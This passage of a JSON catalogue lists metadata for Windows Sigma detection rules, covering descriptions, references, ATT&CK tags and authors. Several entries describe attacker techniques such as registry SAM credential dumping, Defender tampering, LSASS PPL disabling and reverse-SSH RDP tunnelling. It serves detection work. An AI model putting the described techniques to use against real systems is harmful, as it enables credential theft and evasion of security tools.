"https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/10/28", - "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "value": "MSTSC Shadowing", - "meta": { - "refs": [ - "https://twitter.com/kmkz_security/status/1220694202301976576", - "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1563.002" - ], - "creation_date": "2020/01/24", - "filename": "proc_creation_win_rdp_hijack_shadowing.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", - "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", - "value": "Suspicious Redirection to Local Admin Share", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/16", - "filename": "proc_creation_win_redirect_local_admin_share.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", - "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", - "value": "Cmd Stream Redirection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/02/04", - "filename": "proc_creation_win_redirect_to_stream.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "value": "RedMimicry Winnti Playbook Execute", - "meta": { - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" - ], - "creation_date": "2020/06/24", - "filename": "proc_creation_win_redmimicry_winnti_proc.yml", - "author": "Alexander Rausch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the export of a crital Registry key to a file.", - "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", - "value": "Exports Critical Registry Keys To a File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1012" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_regedit_export_critical_keys.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "high", - "falsepositive": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the export of the target Registry key to a file.", - "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", - "value": "Exports Registry Key To a File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1012" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_regedit_export_keys.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate export of keys" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "value": "Imports Registry Key From a File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_regedit_import_keys.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate import of keys", - "Evernote" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "value": "Imports Registry Key From an ADS", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_regedit_import_keys_ads.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", - "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", - "value": "Modifies the Registry From a File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_win_regini.yml", - "author": "Eli Salem, Sander Wiebing, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate modification of keys" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", - "value": "Modifies the Registry From a ADS", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_regini_ads.yml", - "author": "Eli Salem, Sander Wiebing, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", - "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", - "value": "Reg Add RUN Key", - "meta": { - "refs": [ - "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", - "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2021/06/28", - "filename": "proc_creation_win_reg_add_run_key.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", - "value": "Add SafeBoot Keys Via Reg Utility", - "meta": { - "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/09/02", - "filename": "proc_creation_win_reg_add_safeboot.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.", - "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", - "value": "Registry Defender Exclusions", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://redcanary.com/threat-detection-report/threats/qbot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_reg_defender_exclusion.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects reg command lines that disable certain important features of Microsoft Defender", - "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", - "value": "Registry Defender Tampering", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/03/22", - "filename": "proc_creation_win_reg_defender_tampering.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Rare legitimate use by administrators to test software (should always be investigated)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", - "value": "Delete SafeBoot Keys Via Reg Utility", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/08", - "filename": "proc_creation_win_reg_delete_safeboot.yml", - "author": "Nasreddine Bencherchali, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", - "value": "Delete Services Via Reg Utility", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_reg_delete_services.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", - "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", - "value": "Registry Dump of SAM Creds and Secrets", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2022/01/05", - "filename": "proc_creation_win_reg_dump_sam.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys", - "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", - "value": "Enabling RDP Service via Reg.exe", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" - ], - "creation_date": "2022/02/12", - "filename": "proc_creation_win_reg_enable_rdp.yml", - "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility", - "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", - "value": "Imports Registry Key From a File Using Reg.exe", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate import of keys" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects reg command lines that disables PPL on the LSA process", - "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", - "value": "Registry Disabling LSASS PPL", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.010" - ], - "creation_date": "2022/03/22", - "filename": "proc_creation_win_reg_lsass_ppl.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", - "value": "Service ImagePath Change with Reg.exe", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.011" - ], - "creation_date": "2021/12/30", - "filename": "proc_creation_win_reg_service_imagepath_change.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", - "value": "Potential Remote Desktop Tunneling", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_remote_desktop_tunneling.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", - "value": "Remote File Download via Desktopimgdownldr Utility", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "value": "Remote PowerShell Session Host Process (WinRM)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" - ], - "creation_date": "2019/09/12", - "filename": "proc_creation_win_remote_powershell_session_process.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "medium", - "falsepositive": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", - "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", - "value": "Discovery of a System Time", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1124" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_remote_time_discovery.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate use of the system utilities to discover system time for legitimate reason" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "value": "Remove Windows Defender Definition Files", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/07", - "filename": "proc_creation_win_remove_windows_defender_definition_files.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", - "value": "Renamed Binary", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1036/", - "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/06/15", - "filename": "proc_creation_win_renamed_binary.yml", - "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)", - "level": "medium", - "falsepositive": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", - "value": "Highly Relevant Renamed Binary", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1036/", - "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/06/15", - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", - "author": "Matthew Green - @mgreen27, Florian Roth", - "level": "high", - "falsepositive": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "value": "Process Creation with Renamed BrowserCore.exe", - "meta": { - "refs": [ - "https://twitter.com/mariuszbit/status/1531631015139102720", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" - ], - "tags": [ - "attack.t1528", - "attack.t1036.003" - ], - "creation_date": "2022/06/02", - "filename": "proc_creation_win_renamed_browsercore.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field", - "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", - "value": "Renamed FTP.EXE Binary Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_renamed_ftp.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects renamed jusched.exe used by cobalt group", - "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "value": "Renamed jusched.exe", - "meta": { - "refs": [ - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/06/04", - "filename": "proc_creation_win_renamed_jusched.yml", - "author": "Markus Neis, Swisscom", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "value": "Rename Mavinject Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" - ], - "creation_date": "2022/12/05", - "filename": "proc_creation_win_renamed_mavinject.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", - "value": "Renamed MegaSync", - "meta": { - "refs": [ - "https://redcanary.com/blog/rclone-mega-extortion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/06/22", - "filename": "proc_creation_win_renamed_megasync.yml", - "author": "Sittikorn S", - "level": "high", - "falsepositive": [ - "Software that illegaly integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process creation with a renamed Msdt.exe", - "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "value": "Renamed Msdt.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_win_renamed_msdt.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "uuid": "0afbd410-de03-4078-8491-f132303cb67d", - "value": "Execution of Renamed NetSupport RAT", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_renamed_netsupport_rat.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed paexec via imphash and executable product string", - "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", - "value": "Execution of Renamed PaExec", - "meta": { - "refs": [ - "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", - 